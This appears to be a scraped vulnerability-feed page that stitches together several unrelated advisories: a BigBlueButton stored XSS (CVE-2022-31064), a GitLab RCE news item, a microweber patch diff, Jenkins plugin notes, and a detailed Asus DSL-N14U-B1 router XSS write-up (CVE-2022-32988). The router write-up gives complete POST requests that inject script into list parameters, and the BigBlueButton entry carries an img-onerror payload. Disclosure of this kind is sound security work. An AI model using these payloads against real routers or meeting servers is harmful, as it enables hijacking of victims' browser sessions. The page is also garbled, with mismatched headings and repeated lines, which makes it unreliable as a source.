BigBlueButton versions 2.3, prior to 2.4.8, and prior to 2.5.0 suffer from a persistent cross site scripting vulnerability.

CVE-2022-31064 - Stored Cross-Site Scripting in BigBlueButton.

=========================

Exploit Title: Stored Cross-Site Scripting (XSS) in BigBlueButton

Product: BigBlueButton

Vendor: BigBlueButton

Vulnerable Versions: 2.3, <2.4.8, <2.5.0

Tested Version: 2.4.7

Advisory Publication: Jun 22, 2022

Latest Update: Jun 22, 2022

Vulnerability Type: Cross-Site Scripting [CWE-79]

CVE Reference: CVE-2022-31064

CVSS Severity: High

CVSS Score: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N  
Impact score: 7.2

Credit: Rick Verdoes & Danny de Weille (Hackify | pentests.nl)  
=========================

I. BACKGROUND

-------------------------  
BigBlueButton is an open source web conferencing system designed for online meetings and online learning. BigBlueButton is a tool used by instructors and teachers, which helps them access to Learning Management Systems, engagement tools and analytics.

II. VULNERABILITY  
-------------------------  
Users in meetings with private chat enabled are vulnerable to a cross site scripting attack in affected versions. The attack occurs when the attacker (with a XSS payload in the name) starts a chat. in the victim's client the JavaScript will be executed. This issue has been addressed in version 2.4.8 and 2.5.0. There are no known workarounds for this issue.

III. Proof of Concept  
-------------------------  
<img x onerror=alert()>

IV. References  
-------------------------  
Security advisory https://pentests.nl/pentest-blog/stored-xss-in-bigbluebutton/  
Patched on BigBlueButton 2.5 (https://github.com/bigbluebutton/bigbluebutton/pull/15067)  
Patched on BigBlueButton 2.4 (https://github.com/bigbluebutton/bigbluebutton/pull/15090)

BigBlueButton 2.3 / 2.4.7 Cross Site Scripting

Multiple persistent cross-site scripting (XSS) flaws were found in the way Aerogear handled certain user-supplied content. A remote attacker could use these flaws to compromise the application with specially crafted input.

CVE-2014-3650

Users are urged to update to the latest version

Users are urged to update to the latest version

  

Gitlab has patched a critical vulnerability that could allow an attacker to execute code remotely.

The security issue, which has been rated as critical, has been discovered in all versions of GitLab, starting from 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1.

An authenticated user could import a maliciously crafted project leading to remote code execution, an advisory from GitLab reads.

The bug (CVE-2022-2185) has been patched in the latest version.

**Multiple vulnerabilities**

Fixes for a number of other vulnerabilities were also released in the latest version, including two separate cross-site scripting (XSS) bugs.

More details about the patched vulnerabilities can be found in the Gitlab security advisory.

The security bugs affect both GitLab Community Edition and Enterprise Edition. Gitlab has recommended users upgrade to the latest version.

The advisory reads: “We strongly recommend that all installations running a version affected by the issues described below are upgraded to the latest version as soon as possible.

“When no specific deployment type (omnibus, source code, helm chart, etc.) of a product is mentioned, this means all types are affected.”

YOU MAY ALSO LIKE UnRAR path traversal flaw can lead to RCE in Zimbra

Gitlab patches critical RCE bug in latest security release

Cross-site Scripting (XSS) - Stored in GitHub repository microweber/microweber prior to 1.2.19.

@@ -336,9 +336,12 @@

// Make sure the fileName is unique but only if chunking is disabled

if ($chunks < 2 && file\_exists($targetDir . DIRECTORY\_SEPARATOR . $fileName)) {

$ext = strrpos($fileName, '.');

  

$fileName\_a = substr($fileName, 0, $ext);

$fileName\_b = substr($fileName, $ext);

  

$fileName\_b = strtolower($fileName\_b);

  

$count = 1;

while (file\_exists($targetDir . DIRECTORY\_SEPARATOR . $fileName\_a . '\_' . $count . $fileName\_b)) {

++$count;

@@ -500,7 +503,7 @@

  

if (is\_file($filePath) and !$chunks || $chunk == $chunks - 1) {

$ext = get\_file\_extension($filePath);

  

$ext = strtolower($ext);

if (function\_exists('finfo\_open') and function\_exists('finfo\_file')) {

$finfo = finfo\_open(FILEINFO\_MIME\_TYPE); // return mime type ala mimetype extension

$mime = @finfo\_file($finfo, $filePath);

CVE-2022-2280: update · microweber/microweber@9ebbb4d

Cross Site Scripting (XSS) vulnerability in router Asus DSL-N14U-B1 1.1.2.3_805 via the "*list" parameters (e.g. filter_lwlist, keyword_rulelist, etc) in every ".asp" page containing a list of stored strings. The following asp files are affected: (1) cgi-bin/APP_Installation.asp, (2) cgi-bin/Advanced_ACL_Content.asp, (3) cgi-bin/Advanced_ADSL_Content.asp, (4) cgi-bin/Advanced_ASUSDDNS_Content.asp, (5) cgi-bin/Advanced_AiDisk_ftp.asp, (6) cgi-bin/Advanced_AiDisk_samba.asp, (7) cgi-bin/Advanced_DSL_Content.asp, (8) cgi-bin/Advanced_Firewall_Content.asp, (9) cgi-bin/Advanced_FirmwareUpgrade_Content.asp, (10) cgi-bin/Advanced_GWStaticRoute_Content.asp, (11) cgi-bin/Advanced_IPTV_Content.asp, (12) cgi-bin/Advanced_IPv6_Content.asp, (13) cgi-bin/Advanced_KeywordFilter_Content.asp, (14) cgi-bin/Advanced_LAN_Content.asp, (15) cgi-bin/Advanced_Modem_Content.asp, (16) cgi-bin/Advanced_PortTrigger_Content.asp, (17) cgi-bin/Advanced_QOSUserPrio_Content.asp, (18) cgi-bin/Advanced_QOSUserRules_Content.asp, (19) cgi-bin/Advanced_SettingBackup_Content.asp, (20) cgi-bin/Advanced_System_Content.asp, (21) cgi-bin/Advanced_URLFilter_Content.asp, (22) cgi-bin/Advanced_VPN_PPTP.asp, (23) cgi-bin/Advanced_VirtualServer_Content.asp, (24) cgi-bin/Advanced_WANPort_Content.asp, (25) cgi-bin/Advanced_WAdvanced_Content.asp, (26) cgi-bin/Advanced_WMode_Content.asp, (27) cgi-bin/Advanced_WWPS_Content.asp, (28) cgi-bin/Advanced_Wireless_Content.asp, (29) cgi-bin/Bandwidth_Limiter.asp, (30) cgi-bin/Guest_network.asp, (31) cgi-bin/Main_AccessLog_Content.asp, (32) cgi-bin/Main_AdslStatus_Content.asp, (33) cgi-bin/Main_Spectrum_Content.asp, (34) cgi-bin/Main_WebHistory_Content.asp, (35) cgi-bin/ParentalControl.asp, (36) cgi-bin/QIS_wizard.asp, (37) cgi-bin/QoS_EZQoS.asp, (38) cgi-bin/aidisk.asp, (39) cgi-bin/aidisk/Aidisk-1.asp, (40) cgi-bin/aidisk/Aidisk-2.asp, (41) cgi-bin/aidisk/Aidisk-3.asp, (42) cgi-bin/aidisk/Aidisk-4.asp, (43) cgi-bin/blocking.asp, (44) cgi-bin/cloud_main.asp, (45) cgi-bin/cloud_router_sync.asp, (46) cgi-bin/cloud_settings.asp, (47) cgi-bin/cloud_sync.asp, (48) cgi-bin/device-map/DSL_dashboard.asp, (49) cgi-bin/device-map/clients.asp, (50) cgi-bin/device-map/disk.asp, (51) cgi-bin/device-map/internet.asp, (52) cgi-bin/error_page.asp, (53) cgi-bin/index.asp, (54) cgi-bin/index2.asp, (55) cgi-bin/qis/QIS_PTM_manual_setting.asp, (56) cgi-bin/qis/QIS_admin_pass.asp, (57) cgi-bin/qis/QIS_annex_setting.asp, (58) cgi-bin/qis/QIS_bridge_cfg_tmp.asp, (59) cgi-bin/qis/QIS_detect.asp, (60) cgi-bin/qis/QIS_finish.asp, (61) cgi-bin/qis/QIS_ipoa_cfg_tmp.asp, (62) cgi-bin/qis/QIS_manual_setting.asp, (63) cgi-bin/qis/QIS_mer_cfg.asp, (64) cgi-bin/qis/QIS_mer_cfg_tmp.asp, (65) cgi-bin/qis/QIS_ppp_cfg.asp, (66) cgi-bin/qis/QIS_ppp_cfg_tmp.asp, (67) cgi-bin/qis/QIS_wireless.asp, (68) cgi-bin/query_wan_status.asp, (69) cgi-bin/query_wan_status2.asp, and (70) cgi-bin/start_apply.asp.

**CVE-2022-32988****Affected products**

We have not yet tested Asus models other than those listed. However we suspect it may also work on other models with the same firmware version.

        DSL-N14U_B1 V.1.1.2.3_805
        
    

**Overview**

In router **Asus DSL-N14U-B1 1.1.2.3\_805** was discovered to contain a stored cross-site scripting (XSS) vulnerability via the "*list" parameters (e.g. filter_lwlist, keyword_rulelist, etc) in every ".asp" page containing a list of stored strings (e.g. Advanced_Firewall_Content.asp, Advanced_KeywordFilter_Content.asp).

**POC**

Via a *list parameter (e.g. filter_lwlist, keyword_rulelist, etc) in every ".asp" page containing a list of stored strings (e.g. Advanced_Firewall_Content.asp, Advanced_KeywordFilter_Content.asp) the functions tcWebApi_get and TCWebApi_get are executed to generate dynamic JavaScript code.

E.g. filter_lwlist in /cgi-bin/Advanced_Firewall_Content.asp:  
Passing in the POST body:

    filter_lwlist=%3C192.168.2.2%3E443%3E192.168.2.2%3E443%3ETCP'%2balert('XSS')%2b'
    

The backend code:

var wireless = \[\]; // \[\[MAC, associated, authorized\], ...\]
var filter\_lwlist\_array = '<% If tcWebApi\_get("IpMacFilter\_Entry","LtoW\_List","h") <> "" then  tcWebApi\_get("IpMacFilter\_Entry","LtoW\_List","s") end if %>';
function initial(){
        show\_menu();
        showfilter\_lwlist();    
        init\_setting();
        check\_Timefield\_checkbox();
        corrected\_timezone(DAYLIGHT\_orig, TZ\_orig);
}

becomes:

var wireless \= \[\]; // \[\[MAC, associated, authorized\], ...\]
var filter\_lwlist\_array \= '<192.168.2.2>443>192.168.2.2>443>TCP'+alert('XSS')+'';
function initial(){
	show\_menu();
	showfilter\_lwlist();	
	init\_setting();
	check\_Timefield\_checkbox();
	corrected\_timezone(DAYLIGHT\_orig, TZ\_orig);
}

Which is executed in the browser:  

In this router webpanel there are many list of strings submitted by user (e.g. to specify a list of blacklisted IP, a list of ip:port to forward, etc) and in every page tested has been possible to perform XSS. A list of vulnerable pages can be retrieved via:

grep -rPi 'var.\*TCWebApi\_get' boaroot/  | awk -F':' '{print $1}' | sort -u
boaroot/cgi-bin/Advanced\_ACL\_Content.asp
boaroot/cgi-bin/Advanced\_ADSL\_Content.asp
boaroot/cgi-bin/Advanced\_AiDisk\_ftp.asp
boaroot/cgi-bin/Advanced\_AiDisk\_samba.asp
boaroot/cgi-bin/Advanced\_ASUSDDNS\_Content.asp
boaroot/cgi-bin/Advanced\_DSL\_Content.asp
boaroot/cgi-bin/Advanced\_Firewall\_Content.asp
boaroot/cgi-bin/Advanced\_FirmwareUpgrade\_Content.asp
boaroot/cgi-bin/Advanced\_GWStaticRoute\_Content.asp
boaroot/cgi-bin/Advanced\_IPTV\_Content.asp
boaroot/cgi-bin/Advanced\_IPv6\_Content.asp
boaroot/cgi-bin/Advanced\_KeywordFilter\_Content.asp
boaroot/cgi-bin/Advanced\_LAN\_Content.asp
boaroot/cgi-bin/Advanced\_Modem\_Content.asp
boaroot/cgi-bin/Advanced\_PortTrigger\_Content.asp
boaroot/cgi-bin/Advanced\_QOSUserPrio\_Content.asp
boaroot/cgi-bin/Advanced\_QOSUserRules\_Content.asp
boaroot/cgi-bin/Advanced\_SettingBackup\_Content.asp
boaroot/cgi-bin/Advanced\_System\_Content.asp
boaroot/cgi-bin/Advanced\_URLFilter\_Content.asp
boaroot/cgi-bin/Advanced\_VirtualServer\_Content.asp
boaroot/cgi-bin/Advanced\_VPN\_PPTP.asp
boaroot/cgi-bin/Advanced\_WAdvanced\_Content.asp
boaroot/cgi-bin/Advanced\_WANPort\_Content.asp
boaroot/cgi-bin/Advanced\_Wireless\_Content.asp
boaroot/cgi-bin/Advanced\_WMode\_Content.asp
boaroot/cgi-bin/Advanced\_WWPS\_Content.asp
boaroot/cgi-bin/aidisk/Aidisk-1.asp
boaroot/cgi-bin/aidisk/Aidisk-2.asp
boaroot/cgi-bin/aidisk/Aidisk-3.asp
boaroot/cgi-bin/aidisk/Aidisk-4.asp
boaroot/cgi-bin/aidisk.asp
boaroot/cgi-bin/APP\_Installation.asp
boaroot/cgi-bin/Bandwidth\_Limiter.asp
boaroot/cgi-bin/blocking.asp
boaroot/cgi-bin/cloud\_main.asp
boaroot/cgi-bin/cloud\_router\_sync.asp
boaroot/cgi-bin/cloud\_settings.asp
boaroot/cgi-bin/cloud\_sync.asp
boaroot/cgi-bin/device-map/clients.asp
boaroot/cgi-bin/device-map/disk.asp
boaroot/cgi-bin/device-map/DSL\_dashboard.asp
boaroot/cgi-bin/device-map/internet.asp
boaroot/cgi-bin/error\_page.asp
boaroot/cgi-bin/Guest\_network.asp
boaroot/cgi-bin/index2.asp
boaroot/cgi-bin/index.asp
boaroot/cgi-bin/Main\_AccessLog\_Content.asp
boaroot/cgi-bin/Main\_AdslStatus\_Content.asp
boaroot/cgi-bin/Main\_Spectrum\_Content.asp
boaroot/cgi-bin/Main\_WebHistory\_Content.asp
boaroot/cgi-bin/ParentalControl.asp
boaroot/cgi-bin/qis/QIS\_admin\_pass.asp
boaroot/cgi-bin/qis/QIS\_annex\_setting.asp
boaroot/cgi-bin/qis/QIS\_bridge\_cfg\_tmp.asp
boaroot/cgi-bin/qis/QIS\_detect.asp
boaroot/cgi-bin/qis/QIS\_finish.asp
boaroot/cgi-bin/qis/QIS\_ipoa\_cfg\_tmp.asp
boaroot/cgi-bin/qis/QIS\_manual\_setting.asp
boaroot/cgi-bin/qis/QIS\_mer\_cfg.asp
boaroot/cgi-bin/qis/QIS\_mer\_cfg\_tmp.asp
boaroot/cgi-bin/qis/QIS\_ppp\_cfg.asp
boaroot/cgi-bin/qis/QIS\_ppp\_cfg\_tmp.asp
boaroot/cgi-bin/qis/QIS\_PTM\_manual\_setting.asp
boaroot/cgi-bin/qis/QIS\_wireless.asp
boaroot/cgi-bin/QIS\_wizard.asp
boaroot/cgi-bin/QoS\_EZQoS.asp
boaroot/cgi-bin/query\_wan\_status2.asp
boaroot/cgi-bin/query\_wan\_status.asp
boaroot/cgi-bin/start\_apply.asp
boaroot/html/client\_function.js
boaroot/html/general.js
boaroot/html/help.js
boaroot/html/state.js
boaroot/html/validator.js

Example payloads:

    POST /cgi-bin/Advanced_Firewall_Content.asp HTTP/1.1
    Host: 192.168.2.1
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 880
    Origin: http://192.168.2.1
    Connection: close
    Referer: http://192.168.2.1/Advanced_Firewall_Content.asp
    Cookie: asus_token=XXXXXXXXXXXXXXXXXXXX; nwmapRefreshTime=1654435165517
    Upgrade-Insecure-Requests: 1
    
    productid=DSL-N14U&current_page=Advanced_Firewall_Content.asp&next_page=&group_id=filter_lwlist&modified=0&action_mode=apply&action_wait=5&action_script=restart_firewall&first_time=&preferred_lang=EN&firmver=1.1.2.3_805-gadd8a2b&filter_lw_date_x=1111111&filter_lw_time_x=00002359&filter_lw_num_x_0=&filter_lwlist=%3C192.168.2.2%3E443%3E192.168.2.2%3E443%3ETCP'%2balert('XSS')%2b'&editFlag=1&fw_lw_enable_x=1&filter_lw_default_x=DROP&LWKnownApps=User+Defined&filter_lw_date_x_Sun=on&filter_lw_date_x_Mon=on&filter_lw_date_x_Tue=on&filter_lw_date_x_Wed=on&filter_lw_date_x_Thu=on&filter_lw_date_x_Fri=on&filter_lw_date_x_Sat=on&filter_lw_time_x_starthour=00&filter_lw_time_x_startmin=00&filter_lw_time_x_endhour=23&filter_lw_time_x_endmin=59&filter_lw_icmp_x=&filter_lw_srcip_x_0=&filter_lw_srcport_x_0=&filter_lw_dstip_x_0=&filter_lw_dstport_x_0=&filter_lw_proto_x_0=TCP&FAQ_input=
    

    POST /cgi-bin/Advanced_KeywordFilter_Content.asp HTTP/1.1
    Host: 192.168.2.1
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 449
    Origin: http://192.168.2.1
    Connection: close
    Referer: http://192.168.2.1/cgi-bin/Advanced_KeywordFilter_Content.asp
    Cookie: asus_token=XXXXXXXXXXXXXXXXXXXX; nwmapRefreshTime=1654435165517; bw_rtab=ATM
    Upgrade-Insecure-Requests: 1
    
    current_page=Advanced_KeywordFilter_Content.asp&next_page=Advanced_KeywordFilter_Content.asp&next_host=192.168.2.1&modified=0&action_mode=apply&action_wait=5&action_script=restart_firewall&first_time=&preferred_lang=EN&firmver=1.1.2.3_805-gadd8a2b&keyword_num_x_0=&keyword_rulelist=%3CTEST%27%2Balert%28%27XSS%27%29%2B%27&keyword_enable_x_orig=0&editFlag=1&keyword_enable_x=0&keyword_enable_x_0=0&keyword_enable_x_1=0&keyword_keyword_x_0=&FAQ_input=

CVE-2022-32988: GitHub - FedericoHeichou/CVE-2022-32988

A missing permission check in Jenkins XebiaLabs XL Release Plugin 22.0.0 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.

CVE-2022-34779: Jenkins Security Advisory 2022-06-30

Jenkins Plot Plugin 2.1.10 and earlier does not escape plot descriptions, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

CVE-2022-34783: Jenkins Security Advisory 2022-06-30

A missing check in Jenkins RQM Plugin 2.8 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.

CVE-2022-34810: Jenkins Security Advisory 2022-06-30

A cross-site request forgery (CSRF) vulnerability in Jenkins Deployment Dashboard Plugin 1.0.10 and earlier allows attackers to connect to an attacker-specified HTTP URL using attacker-specified credentials.

CVE-2022-34797: Jenkins Security Advisory 2022-06-30

An incorrect permission check in Jenkins requests-plugin Plugin 2.2.16 and earlier allows attackers with Overall/Read permission to view the list of pending requests.

Tag

#xss